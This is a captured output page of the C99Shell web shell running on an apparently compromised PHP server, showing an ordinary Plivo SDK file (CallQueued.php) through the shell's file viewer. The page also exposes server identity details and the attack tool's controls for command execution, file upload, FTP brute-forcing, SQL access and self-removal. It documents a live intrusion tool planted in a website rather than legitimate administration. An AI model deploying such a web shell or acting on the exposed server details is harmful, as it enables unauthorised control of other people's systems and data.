!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/plivo/plivo-php/src/Plivo/Resources/Call/   drwxr-xr-x
Free 29.11 GB of 117.98 GB (24.68%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CallQueued.php (1.56 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Plivo\Resources\Call;


use 
Plivo\BaseClient;
use 
Plivo\Resources\Resource;

/**
 * Class CallQueued
 * @package Plivo\Resources\Call
 */
class CallQueued extends Resource
{
    
/**
     * CallQueued constructor.
     * @param BaseClient $client The Plivo API REST client
     * @param array $response
     * @param string $authId
     */
    
function __construct(BaseClient $client$response$authId)
    {
        
parent::__construct($client);

        
$this->properties = [
            
'direction' => $response['direction'],
            
'from' => $response['from'],
            
'callStatus' => $response['call_status'],
            
'to' => $response['to'],
            
'callName' => $response['caller_name'],
            
'callUuid' => $response['call_uuid'],
            
'requestUuid' => $response['request_uuid'],
            
'apiID' => $response['api_id']
        ];

        
$this->pathParams = [
            
'authId' => $authId,
            
'callUuid' => $response['call_uuid']
        ];

        
$this->id $response['call_uuid'];
    }

    
/**
     * Proxy the actions to the interface
     * @return null|CallInterface
     */
    
public function proxyToInterface()
    {
        if (!
$this->interface) {
            
$this->interface = new CallInterface(
                
$this->client$this->pathParams['authId']);
        }

        return 
$this->interface;
    }

    
/**
     * Cancel this call
     *
     * @return \Plivo\Resources\ResponseDelete
     */
    
public function cancel()
    {
        return 
$this->proxyToInterface()->cancel($this->id);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--